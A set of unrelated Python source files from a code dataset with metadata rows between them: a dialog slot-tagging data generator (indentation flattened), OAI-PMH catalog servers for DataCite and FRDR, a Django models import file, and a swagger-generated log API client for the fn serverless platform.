label_list.insert(index_price + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for date_start in sample_date_start:
for part_of_day in sample_part_of_day:
for template in inform_date_start_and_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(date_start = date_start, part_of_day = part_of_day)
label_list = ['O' for i in range(len(token_list) - 2)]
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' '))))-1):
label_list.insert(index_date_start+1, inform_date_start_tag[1])
token_list = template.format(date_start = date_start, part_of_day = "{part_of_day}").split(' ')
index_part_of_day = token_list.index("{part_of_day}")
label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for time in sample_time:
for price in sample_price:
for template in inform_time_and_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(time = time, price = price)
label_list = ['O' for i in range(len(token_list) - 2)]
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' '))))-1):
label_list.insert(index_time+1, inform_time_tag[1])
token_list = template.format(time = time, price = "{price}").split(' ')
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' ')))) - 1):
label_list.insert(index_price + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for time in sample_time:
for is_weekend in sample_is_weekend:
for template in inform_time_and_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(time = time, is_weekend = is_weekend)
label_list = ['O' for i in range(len(token_list) - 2)]
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' '))))-1):
label_list.insert(index_time+1, inform_time_tag[1])
token_list = template.format(time = time, is_weekend = "{is_weekend}").split(' ')
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for price in sample_price:
for is_weekend in sample_is_weekend:
for template in inform_price_and_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(price = price, is_weekend = is_weekend)
label_list = ['O' for i in range(len(token_list) - 2)]
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' '))))-1):
label_list.insert(index_price+1, inform_price_tag[1])
token_list = template.format(price = price, is_weekend = "{is_weekend}").split(' ')
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for price in sample_price:
for part_of_day in sample_part_of_day:
for template in inform_price_and_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(price = price, part_of_day = part_of_day)
label_list = ['O' for i in range(len(token_list) - 2)]
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' '))))-1):
label_list.insert(index_price+1, inform_price_tag[1])
token_list = template.format(price = price, part_of_day = "{part_of_day}").split(' ')
index_part_of_day = token_list.index("{part_of_day}")
label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for is_weekend in sample_is_weekend:
for part_of_day in sample_part_of_day:
for template in inform_is_weekend_and_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(is_weekend = is_weekend, part_of_day = part_of_day)
label_list = ['O' for i in range(len(token_list) - 2)]
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' '))))-1):
label_list.insert(index_is_weekend+1, inform_is_weekend_tag[1])
token_list = template.format(is_weekend = is_weekend, part_of_day = "{part_of_day}").split(' ')
index_part_of_day = token_list.index("{part_of_day}")
label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
file_1.close()
file_2.close()
print(count) | 64.247681 | 136 | 0.657837 | 28,487 | 187,025 | 4.178151 | 0.026679 | 0.029574 | 0.057947 | 0.036564 | 0.950287 | 0.942272 | 0.925544 | 0.904926 | 0.864875 | 0.812725 | 0 | 0.00408 | 0.224173 | 187,025 | 2,911 | 137 | 64.247681 | 0.816208 | 0.000155 | 0 | 0.285185 | 0 | 0.023704 | 0.642806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000741 | 0 | 0.000741 | 0.025556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
78729aa28bd96eb3200564a973068753d6a7d48c | 20,061 | py | Python | viringo/catalogs.py | axfelix/viringo | 44b3035a374c7c53b8077f6061402d9fdf595450 | [
"MIT"
] | null | null | null | viringo/catalogs.py | axfelix/viringo | 44b3035a374c7c53b8077f6061402d9fdf595450 | [
"MIT"
] | null | null | null | viringo/catalogs.py | axfelix/viringo | 44b3035a374c7c53b8077f6061402d9fdf595450 | [
"MIT"
] | 1 | 2020-06-19T16:35:52.000Z | 2020-06-19T16:35:52.000Z | """
OAI-PMH compatible catalogs for parsing data and building appropriate responses.
They conform to the oaipmh.common.ResumptionOAIPMH interface provided by the
pyoai library.
"""
import base64
import binascii
import logging
from datetime import datetime
from oaipmh import common, error
from viringo import config
from .services import datacite
from .services import frdr
class DataCiteOAIServer():
"""Build OAI-PMH data responses for DataCite metadata catalog"""
def identify(self):
"""Construct common identification for the OAI service"""
identify = common.Identify(
repositoryName=config.OAIPMH_REPOS_NAME,
baseURL=config.OAIPMH_BASE_URL,
protocolVersion="2.0",
adminEmails=[config.OAIPMH_ADMIN_EMAIL],
earliestDatestamp=datetime(2011, 1, 1),
deletedRecord='persistent',
granularity='YYYY-MM-DDThh:mm:ssZ',
compression=['gzip', 'deflate'],
toolkit_description=False)
# Specify a custom description
datacite_desc = """
<oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">
<scheme>oai</scheme>
<repositoryIdentifier>oai.datacite.org</repositoryIdentifier>
<delimiter>:</delimiter>
<sampleIdentifier>oai:oai.datacite.org:12425</sampleIdentifier>
</oai-identifier>
"""
identify.add_description(xml_string=datacite_desc)
return identify
def listMetadataFormats(self, identifier=None):
#pylint: disable=no-self-use,invalid-name
"""Returns metadata formats available for the repository
Identifier does nothing as our repository responds in all formats for all dois
"""
# PyOAI Expects result format (metadataPrefix, schema, metadataNamespace)
format_oai_dc = (
'oai_dc',
'http://www.openarchives.org/OAI/2.0/oai_dc.xsd',
'http://www.openarchives.org/OAI/2.0/oai_dc/'
)
format_oai_datacite = (
'oai_datacite',
'http://schema.datacite.org/oai/oai-1.1/oai.xsd',
'http://schema.datacite.org/oai/oai-1.1/'
)
format_datacite = (
'datacite',
'http://schema.datacite.org/meta/nonexistant/nonexistant.xsd',
'http://datacite.org/schema/nonexistant'
)
return [format_oai_dc, format_oai_datacite, format_datacite]
def getRecord(self, metadataPrefix, identifier):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for specific record"""
# We just want the DOI out of the OAI identifier.
_, doi = identifier.split(':', 1)
result = datacite.get_metadata(doi)
if not result:
raise error.IdDoesNotExistError(
"\"%s\" is unknown or illegal in this repository" % identifier
)
# Build metadata based on requested format and result
metadata = self.build_metadata_map(result)
header = self.build_header(result)
record = self.build_record(metadata)
data = (
header,
record,
None # About string - not used
)
return data
def listRecords(
self,
metadataPrefix=None,
from_=None,
until=None,
set=None,
paging_cursor=None
):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for list of records"""
# If available get the search query from the set param
search_query = set_to_search_query(set)
# Get both a provider and client_id from the set
provider_id, client_id = set_to_provider_client(set)
results, total_records, paging_cursor = datacite.get_metadata_list(
query=search_query,
provider_id=provider_id,
client_id=client_id,
from_datetime=from_,
until_datetime=until,
cursor=paging_cursor
)
records = []
if results:
for result in results:
# Build metadata based on requested format and result
metadata = self.build_metadata_map(result)
header = self.build_header(result)
record = self.build_record(metadata)
data = (
header,
record,
None # About string - not used
)
records.append(data)
# This differs from the pyoai implementation in that we have to return a cursor here
# But this is okay as we have a custom server to handle it.
return records, total_records, paging_cursor
def listIdentifiers(
self,
metadataPrefix=None,
from_=None,
until=None,
set=None,
paging_cursor=None
):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for list of identifiers"""
# Get both a provider and client_id from the set
provider_id, client_id = set_to_provider_client(set)
results, total_records, paging_cursor = datacite.get_metadata_list(
provider_id=provider_id,
client_id=client_id,
from_datetime=from_,
until_datetime=until,
cursor=paging_cursor
)
records = []
if results:
for result in results:
header = self.build_header(result)
records.append(header)
# This differs from the pyoai implementation in that we have to return a cursor here
# But this is okay as we have a custom server to handle it.
return records, total_records, paging_cursor
def listSets(
self,
paging_cursor=0
):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for list of sets"""
# Note this implementation is not super efficient as we request
# the full set everytime regardles of actual paging
# The paging is handled just by offsetting the records returned.
# This is however acceptable given sets are a small subset of data.
# We know we're always dealing with a integer value here
paging_cursor = int(paging_cursor)
batch_size = 50
next_batch = paging_cursor + batch_size
results, total_results = datacite.get_sets()
results = results[paging_cursor: next_batch]
if len(results) < batch_size:
paging_cursor = None
else:
paging_cursor = next_batch
records = []
if results:
for identifier, name in results:
# Format of a set is setSpec, setName, setDescription
records.append((identifier.upper(), name, None))
# This differs from the pyoai implementation in that we have to return a cursor here
# But this is okay as we have a custom server to handle it.
return records, total_results, paging_cursor
def build_header(self, result):
"""Construct a OAI-PMH record header"""
# Provider symbol can just be extracted from the client symbol
provider_symbol, _ = result.client.split(".")
return common.Header(
None,
'doi:' + result.identifier,
result.updated_datetime,
setspec=[result.provider, result.client],
deleted=not result.active
)
def build_record(self, metadata):
"""Construct a OAI-PMH payload for a record"""
return common.Metadata(
None,
metadata
)
def build_metadata_map(self, result):
"""Construct a metadata map object for oai metadata writing"""
dates = []
if result.publication_year:
dates.append(str(result.publication_year))
dates.extend([date['type'] + ": " + str(date['date'])
for date in result.dates])
rights = []
for right in result.rights:
if right['statement']:
rights.append(right['statement'])
if right['uri']:
rights.append(right['uri'])
identifiers = [
identifier_to_string(identifier) for identifier in result.identifiers
]
relations = [
identifier_to_string(relation)
for relation in result.relations
]
contributors = [
contributor.get('name') for contributor in result.contributors
]
metadata = {
'title': result.titles,
'creator': result.creators,
'subject': result.subjects,
'description': result.descriptions,
'publisher': [result.publisher] if result.publisher else [],
'contributor': contributors,
'date': dates,
'type': result.resource_types,
'format': result.formats,
'identifier': identifiers,
'relation': relations,
'language': [result.language] if result.language else [],
'rights': rights,
'xml': result.xml,
'set': result.client,
'metadata_version': result.metadata_version
}
return metadata
class FRDROAIServer():
"""Build OAI-PMH responses from the FRDR Postgres server"""
def identify(self):
"""Construct common identification for the OAI service"""
identify = common.Identify(
repositoryName=config.OAIPMH_REPOS_NAME,
baseURL=config.OAIPMH_BASE_URL,
protocolVersion="2.0",
adminEmails=[config.OAIPMH_ADMIN_EMAIL],
earliestDatestamp=datetime(2011, 1, 1),
deletedRecord='no',
granularity='YYYY-MM-DDThh:mm:ssZ',
compression=['gzip', 'deflate'],
toolkit_description=False)
# Specify a custom description
frdr_desc = """
<oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">
<scheme>oai</scheme>
<repositoryIdentifier>""" + config.OAIPMH_IDENTIFIER + """</repositoryIdentifier>
<delimiter>:</delimiter>
<sampleIdentifier>oai""" + config.OAIPMH_IDENTIFIER + """:1</sampleIdentifier>
</oai-identifier>
"""
identify.add_description(xml_string=frdr_desc)
return identify
def listMetadataFormats(self, identifier=None):
#pylint: disable=no-self-use,invalid-name
"""Returns metadata formats available for the repository
Identifier does nothing as our repository responds in all formats for all dois
"""
# PyOAI Expects result format (metadataPrefix, schema, metadataNamespace)
format_oai_dc = (
'oai_dc',
'http://www.openarchives.org/OAI/2.0/oai_dc.xsd',
'http://www.openarchives.org/OAI/2.0/oai_dc/'
)
format_oai_datacite = (
'oai_datacite',
'http://schema.datacite.org/oai/oai-1.1/oai.xsd',
'http://schema.datacite.org/oai/oai-1.1/'
)
format_datacite = (
'datacite',
'http://schema.datacite.org/meta/nonexistant/nonexistant.xsd',
'http://datacite.org/schema/nonexistant'
)
return [format_oai_dc, format_oai_datacite, format_datacite]
def getRecord(self, metadataPrefix, identifier):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for specific record"""
# Should we implement this based on source_url and local_identifier the way we currently do for the harvester?
result = frdr.get_metadata(identifier, db=config.POSTGRES_DB, user=config.POSTGRES_USER, password=config.POSTGRES_PASSWORD, server=config.POSTGRES_SERVER, port=config.POSTGRES_PORT)
if not result:
raise error.IdDoesNotExistError(
"\"%s\" is unknown or illegal in this repository" % identifier
)
# Build metadata based on requested format and result
metadata = self.build_metadata_map(result)
header = self.build_header(result)
record = self.build_record(metadata)
data = (
header,
record,
None # About string - not used
)
return data
def listRecords(
self,
metadataPrefix=None,
from_=None,
until=None,
set=None,
paging_cursor=None
):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for list of records"""
# If available get the search query from the set param
search_query = set_to_search_query(set)
results, total_records, paging_cursor = frdr.get_metadata_list(
server=config.POSTGRES_SERVER,
db=config.POSTGRES_DB,
user=config.POSTGRES_USER,
password=config.POSTGRES_PASSWORD,
port=config.POSTGRES_PORT,
query=search_query,
set=set,
from_datetime=from_,
until_datetime=until,
cursor=paging_cursor
)
if paging_cursor >= total_records:
paging_cursor = None
records = []
if results:
for result in results:
# Build metadata based on requested format and result
metadata = self.build_metadata_map(result)
header = self.build_header(result)
record = self.build_record(metadata)
data = (
header,
record,
None # About string - not used
)
records.append(data)
# This differs from the pyoai implementation in that we have to return a cursor here
# But this is okay as we have a custom server to handle it.
return records, total_records, paging_cursor
def listIdentifiers(
self,
metadataPrefix=None,
from_=None,
until=None,
set=None,
paging_cursor=None
):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for list of identifiers"""
# If available get the search query from the set param
search_query = set_to_search_query(set)
results, total_records, paging_cursor = frdr.get_metadata_list(
server=config.POSTGRES_SERVER,
db=config.POSTGRES_DB,
user=config.POSTGRES_USER,
password=config.POSTGRES_PASSWORD,
port=config.POSTGRES_PORT,
query=search_query,
set=set,
from_datetime=from_,
until_datetime=until,
cursor=paging_cursor
)
if paging_cursor >= total_records:
paging_cursor = None
records = []
if results:
for result in results:
header = self.build_header(result)
records.append(header)
# This differs from the pyoai implementation in that we have to return a cursor here
# But this is okay as we have a custom server to handle it.
return records, total_records, paging_cursor
def listSets(
self,
paging_cursor=0
):
#pylint: disable=no-self-use,invalid-name
"""Returns pyoai data tuple for list of sets"""
# Note this implementation is not super efficient as we request
# the full set everytime regardles of actual paging
# The paging is handled just by offsetting the records returned.
# This is however acceptable given sets are a small subset of data.
# We know we're always dealing with a integer value here
paging_cursor = int(paging_cursor)
batch_size = 50
next_batch = paging_cursor + batch_size
results, total_results = frdr.get_sets(db=config.POSTGRES_DB, user=config.POSTGRES_USER, password=config.POSTGRES_PASSWORD, server=config.POSTGRES_SERVER, port=config.POSTGRES_PORT)
results = results[paging_cursor: next_batch]
if len(results) < batch_size:
paging_cursor = None
else:
paging_cursor = next_batch
records = []
if results:
for identifier, name in results:
# Format of a set is setSpec, setName, setDescription
records.append((identifier, name, None))
# This differs from the pyoai implementation in that we have to return a cursor here
# But this is okay as we have a custom server to handle it.
return records, total_results, paging_cursor
def build_header(self, result):
"""Construct a OAI-PMH record header"""
return common.Header(
None,
str(result.identifier),
result.updated_datetime,
setspec=[result.client],
deleted=not result.active
)
def build_record(self, metadata):
"""Construct a OAI-PMH payload for a record"""
return common.Metadata(
None,
metadata
)
def build_metadata_map(self, result):
"""Construct a metadata map object for oai metadata writing"""
identifiers = result.identifiers
relations = [
identifier_to_string(relation)
for relation in result.relations
]
metadata = {
'title': result.titles,
'creator': result.creators,
'subject': result.subjects,
'description': result.descriptions,
'publisher': [result.publisher] if result.publisher else [],
'contributor': result.contributors,
'date': result.dates,
'type': result.resource_types,
'format': result.formats,
'identifier': identifiers,
'relation': relations,
'language': [result.language] if result.language else [],
'rights': result.rights,
'xml': result.xml,
'set': result.client,
'metadata_version': result.metadata_version
}
return metadata
def set_to_search_query(unparsed_set):
"""Take a oai set and extract any base64url encoded search query"""
if unparsed_set and "~" in unparsed_set:
_, search_query_base64 = unparsed_set.split("~")
try:
return base64.urlsafe_b64decode(search_query_base64).decode("utf-8")
except binascii.Error:
logging.debug("Unable to parse set search query")
return ""
return ""
def set_to_provider_client(unparsed_set):
"""Take a oai set and convert into provider_id and client_id"""
# Get both a provider and client_id from the set
client_id = None
provider_id = None
if unparsed_set:
# Strip any additional query
if "~" in unparsed_set:
unparsed_set, _ = unparsed_set.split("~")
if unparsed_set:
# DataCite API deals in lowercase
unparsed_set = unparsed_set.lower()
if "." in unparsed_set:
provider_id, _ = unparsed_set.split(".")
client_id = unparsed_set
else:
provider_id = unparsed_set
return provider_id, client_id
def identifier_to_string(identifier):
"""Take an identifier and return in a formatted in single string"""
_id = identifier.get('identifier')
_type = identifier.get('type') or ''
return _type.lower() + ":" + _id
| 33.886824 | 264 | 0.603011 | 2,223 | 20,061 | 5.311291 | 0.135403 | 0.036588 | 0.016092 | 0.018633 | 0.824765 | 0.81511 | 0.81511 | 0.802914 | 0.79275 | 0.79275 | 0 | 0.005794 | 0.311749 | 20,061 | 591 | 265 | 33.944162 | 0.849352 | 0.223867 | 0 | 0.73913 | 0 | 0.005115 | 0.13668 | 0.016865 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053708 | false | 0.01023 | 0.02046 | 0 | 0.138107 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
78a0e4766bdb2f5f77e44ca4384168c5297fd923 | 196 | py | Python | onadata/apps/api/models/__init__.py | sounay/flaming-octo-tribble | 21f21f0e7b2d7f745173f7957375a9d96c2a065e | [
"BSD-2-Clause"
] | 2 | 2017-11-30T17:43:48.000Z | 2018-10-26T23:44:32.000Z | onadata/apps/api/models/__init__.py | sounay/flaming-octo-tribble | 21f21f0e7b2d7f745173f7957375a9d96c2a065e | [
"BSD-2-Clause"
] | 14 | 2018-07-10T12:48:46.000Z | 2022-03-11T23:24:51.000Z | onadata/apps/api/models/__init__.py | sounay/flaming-octo-tribble | 21f21f0e7b2d7f745173f7957375a9d96c2a065e | [
"BSD-2-Clause"
] | 5 | 2018-07-04T07:59:14.000Z | 2020-01-28T07:50:18.000Z | from onadata.apps.api.models.organization_profile import OrganizationProfile # flake8: noqa
from onadata.apps.api.models.team import Team
from onadata.apps.api.models.temp_token import TempToken
| 49 | 92 | 0.846939 | 28 | 196 | 5.857143 | 0.535714 | 0.20122 | 0.27439 | 0.329268 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005556 | 0.081633 | 196 | 3 | 93 | 65.333333 | 0.905556 | 0.061224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
78cf0a2981e51fda300a61a2830125ce99f5f8db | 10,440 | py | Python | swagger_client/apis/log_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | 6 | 2017-09-24T16:50:49.000Z | 2019-10-23T22:14:39.000Z | swagger_client/apis/log_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/log_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
fn
The open source serverless platform.
OpenAPI spec version: 0.2.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class LogApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def apps_app_calls_call_log_delete(self, call, app, **kwargs):
"""
Delete call log entry
Delete call log entry
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_delete(call, app, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str call: Call ID. (required)
:param str app: App name. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
else:
(data) = self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
return data
def apps_app_calls_call_log_delete_with_http_info(self, call, app, **kwargs):
"""
Delete call log entry
Delete call log entry
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_delete_with_http_info(call, app, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str call: Call ID. (required)
:param str app: App name. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['call', 'app']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method apps_app_calls_call_log_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'call' is set
if ('call' not in params) or (params['call'] is None):
raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_delete`")
# verify the required parameter 'app' is set
if ('app' not in params) or (params['app'] is None):
raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_delete`")
collection_formats = {}
path_params = {}
if 'call' in params:
path_params['call'] = params['call']
if 'app' in params:
path_params['app'] = params['app']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def apps_app_calls_call_log_get(self, app, call, **kwargs):
"""
Get call logs
Get call logs
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_get(app, call, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: App Name (required)
:param str call: Call ID. (required)
:return: LogWrapper
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
else:
(data) = self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
return data
def apps_app_calls_call_log_get_with_http_info(self, app, call, **kwargs):
"""
Get call logs
Get call logs
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_get_with_http_info(app, call, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: App Name (required)
:param str call: Call ID. (required)
:return: LogWrapper
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['app', 'call']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method apps_app_calls_call_log_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'app' is set
if ('app' not in params) or (params['app'] is None):
raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_get`")
# verify the required parameter 'call' is set
if ('call' not in params) or (params['call'] is None):
raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_get`")
collection_formats = {}
path_params = {}
if 'app' in params:
path_params['app'] = params['app']
if 'call' in params:
path_params['call'] = params['call']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LogWrapper',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
